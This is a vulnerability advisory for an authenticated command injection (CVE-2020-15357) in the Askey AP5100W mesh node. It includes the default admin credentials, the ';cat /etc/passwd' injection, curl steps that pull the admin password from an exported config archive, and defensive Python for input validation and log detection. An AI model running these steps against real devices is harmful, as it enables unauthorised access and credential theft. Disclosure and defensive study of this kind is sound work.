Askey AP5100W Authenticated Command Injection in Web Interface

CVE ID

CVE-2020-15357

Tested Versions

  • Askey AP5100W version Dual_SIG_1.01.071

Product URL(s)

  • https://www.askey.com.tw/

The Askey AP5100W was a WiFi mesh node provided to Singtel customers as part of their Fibre Broadband contract package. It is used to provide greater WiFi coverage in homes or offices.

The WiFi mesh node comes with a configurable web interface that allows users to modify settings on their mesh nodes and run diagnostics.

Vulnerability

The default login credentials of the web interface for the Askey AP5100W are as follows:

  • Login Name: admin
  • Password: admin

After authenticating, a user can run network diagnostics on the WiFi mesh node by clicking Tools > Network Analysis and choosing between ping, traceroute, and route. For ping and traceroute, the user-supplied input is not sanitised, so a trivial command injection can be performed by appending ;cat /etc/passwd to the target argument.
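The pattern behind this class of bug, shown as an added example for this page rather than the AP5100W's own firmware code: a diagnostic handler that concatenates the user's target into a shell string, beside a hardened handler that whitelists the tool, validates the target as an IP address or RFC 1123 hostname, and executes an argument vector so a ';' in the input has no meaning. The tool names and the ping/traceroute options are assumptions for illustration.

```python
"""Command-injection pattern behind an unsanitised ping/traceroute target,
beside a hardened version.

Illustrative code written for this advisory page; it is NOT the AP5100W
firmware. The ping/traceroute options are assumptions.
"""
import ipaddress
import re
import subprocess

# Fixed argument vectors for the two diagnostics that take a target.
# Options are assumed for illustration, not taken from the device.
ALLOWED_TOOLS = {
    "ping": ["ping", "-c", "4"],
    "traceroute": ["traceroute", "-m", "15"],
}

# One RFC 1123 hostname label: letters, digits and hyphens, 1-63 chars,
# no leading or trailing hyphen. This also rejects a leading "-" that ping
# would otherwise parse as an option.
_LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def vulnerable_command(tool, target):
    """The unsafe pattern: user input concatenated into one string that is
    handed to /bin/sh (shell=True). Returned, not executed, so the effect of
    a target such as '8.8.8.8;cat /etc/passwd' can be inspected: the shell
    sees two commands separated by ';'."""
    return f"{tool} {target}"


def is_valid_target(target):
    """Accept only a literal IPv4/IPv6 address or an RFC 1123 hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    if not target or len(target) > 253:
        return False
    labels = target.rstrip(".").split(".")
    return all(_LABEL_RE.match(label) for label in labels)


def build_argv(tool, target):
    """Hardened form: whitelist the tool, validate the target, and build an
    argument vector so no shell is involved and ';' is just a character."""
    if tool not in ALLOWED_TOOLS:
        raise ValueError(f"unsupported diagnostic tool: {tool!r}")
    if not is_valid_target(target):
        raise ValueError(f"invalid target: {target!r}")
    return ALLOWED_TOOLS[tool] + [target]


def run_diagnostic(tool, target, timeout=30):
    """Execute the validated diagnostic without a shell and return its output."""
    argv = build_argv(tool, target)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    injected = "8.8.8.8;cat /etc/passwd"
    print("shell=True would run:", vulnerable_command("ping", injected))
    print("argv form:", build_argv("ping", "8.8.8.8"))
    try:
        build_argv("ping", injected)
    except ValueError as exc:
        print("rejected:", exc)
```

The validation is deliberately an allow-list (what a target may look like) rather than a deny-list of shell metacharacters; the argument vector is the real fix, and the allow-list additionally stops option injection such as a target beginning with "-".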

How to exploit

An attacker could chain all three vulnerabilities (CVE-2020-15357, CVE-2020-25545, CVE-2020-25546). Any attacker on the network, whether on the guest network or an adjacent network, who is able to reach the web interface can set up a script to repeatedly call

curl 'http://192.168.1.7/status.cgi?_=1590132976934&nvget=sysinfo'

to check if anyone has logged into the web interface.

As soon as the response is not {"login":"0"}, run the following commands to obtain the admin login password for the web interface.

curl 'http://IP_ADDR_OF_WEB_INTERFACE/setup/toolsConfigDownload.htm?_=1590131613045' -H 'Accept: text/html, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'X-Requested-With: XMLHttpRequest' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://IP_ADDR_OF_WEB_INTERFACE/'

curl http://IP_ADDR_OF_WEB_INTERFACE/configs/config.tar | grep gui_pwd

Once logged into the web interface, click Tools > Network Analysis and choose either ping or traceroute to inject commands by appending ;cat /etc/passwd to the target.
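From the defender's side, the chain above leaves a recognisable trace in the device's or an upstream proxy's web access log: a single client polling status.cgi?nvget=sysinfo at a high rate, followed by a configuration export via toolsConfigDownload.htm and a download of /configs/config.tar, then a Network Analysis request whose target carries shell metacharacters. The following detection logic is an added example for this page, not a vendor artefact. It assumes Common Log Format lines and that the Network Analysis target is sent as a query-string parameter; the sample lines and the /DIAG_ENDPOINT_PLACEHOLDER.cgi path are constructed, and only the three paths named in the advisory are taken from it.

```python
"""Detection logic for the attack chain described above, run over constructed
sample access-log lines.

Added example for this advisory page, not a vendor artefact. Assumptions: the
device (or a proxy in front of it) logs in Common Log Format, and the Network
Analysis target travels as a query-string parameter. The sample lines and the
/DIAG_ENDPOINT_PLACEHOLDER.cgi path are constructed; only status.cgi,
toolsConfigDownload.htm and config.tar come from the advisory.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Paths used by the exploit chain in the advisory.
CONFIG_EXPORT_PATHS = {"/setup/toolsConfigDownload.htm", "/configs/config.tar"}
LOGIN_POLL_PATH = "/status.cgi"
# Characters the shell treats specially; none belongs in a ping/traceroute target.
SHELL_META_RE = re.compile(r"[;&|`$<>\n]")
# Polling threshold: this many sysinfo requests from one client inside the window.
POLL_THRESHOLD = 10
POLL_WINDOW_S = 60


def parse_query(query):
    """Split a query string on '&' only (so a raw ';' stays inside the value)
    and percent-decode each key and value."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((unquote(key), unquote(value)))
    return pairs


def parse_line(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["query"] = parse_query(parts.query)
    return rec


def detect(lines):
    """Return (kind, client_ip, detail) alerts for the three behaviours."""
    alerts = []
    polls = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"] in CONFIG_EXPORT_PATHS:
            alerts.append(("config_export", rec["ip"], rec["path"]))
        for key, value in rec["query"]:
            if SHELL_META_RE.search(value):
                alerts.append(("shell_meta", rec["ip"], f"{key}={value}"))
        if rec["path"] == LOGIN_POLL_PATH and ("nvget", "sysinfo") in rec["query"]:
            polls[rec["ip"]].append(rec["ts"])
    # Sliding window over each client's sysinfo polls.
    for ip, stamps in polls.items():
        stamps.sort()
        for i, start in enumerate(stamps):
            in_window = sum(1 for t in stamps[i:] if (t - start).total_seconds() <= POLL_WINDOW_S)
            if in_window >= POLL_THRESHOLD:
                alerts.append(("login_polling", ip, f"{in_window} sysinfo polls within {POLL_WINDOW_S}s"))
                break
    return alerts


def constructed_sample_log():
    """Constructed sample lines (not captured from a real device)."""
    lines = [
        f'192.168.1.50 - - [22/May/2020:10:00:{5 * i:02d} +0800] '
        f'"GET /status.cgi?_=1590132976934&nvget=sysinfo HTTP/1.1" 200 15'
        for i in range(12)  # 12 polls in 55 seconds: the login-status check
    ]
    lines += [
        # Ordinary page load from a different client.
        '192.168.1.20 - - [22/May/2020:10:00:30 +0800] "GET / HTTP/1.1" 200 1024',
        # Configuration export and download from the polling client.
        '192.168.1.50 - - [22/May/2020:10:01:02 +0800] '
        '"GET /setup/toolsConfigDownload.htm?_=1590131613045 HTTP/1.1" 200 88',
        '192.168.1.50 - - [22/May/2020:10:01:03 +0800] "GET /configs/config.tar HTTP/1.1" 200 20480',
        # Network Analysis request carrying ';cat /etc/passwd' in the target.
        # The endpoint path is a placeholder; the advisory names only the menu entry.
        '192.168.1.50 - - [22/May/2020:10:02:10 +0800] '
        '"GET /DIAG_ENDPOINT_PLACEHOLDER.cgi?tool=ping&target=8.8.8.8%3Bcat%20%2Fetc%2Fpasswd HTTP/1.1" 200 512',
    ]
    return lines


if __name__ == "__main__":
    for alert in detect(constructed_sample_log()):
        print(alert)
```

The config-export rule will also fire on a legitimate administrator backing up the device, so it is an alert to correlate (same client also polling sysinfo, or a config download with no preceding interactive session) rather than a block on its own; the metacharacter rule, by contrast, should never fire for a genuine ping or traceroute target.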

Vendor Response

The vendor didn't reply to us despite all the efforts we made.

Timeline

  • 2020-05-22 Reported to Askey; no reply from Askey.
  • 2020-05-28 Reported to Askey again; no reply from Askey.
  • 2020-06-03 Reported to CSA; CSA replied the same day saying that they would inform Askey and SingTel.
  • 2020-06-09 Emailed CSA again; CSA replied that SingTel and Askey had not got back to them.
  • 2020-06-09 Reported to MITRE; no reply.
  • 2020-07-14 Reported to MITRE again; again no reply.
  • 2020-09-15 MITRE finally replied with the CVE.

Credit

Discovered by Li Bailin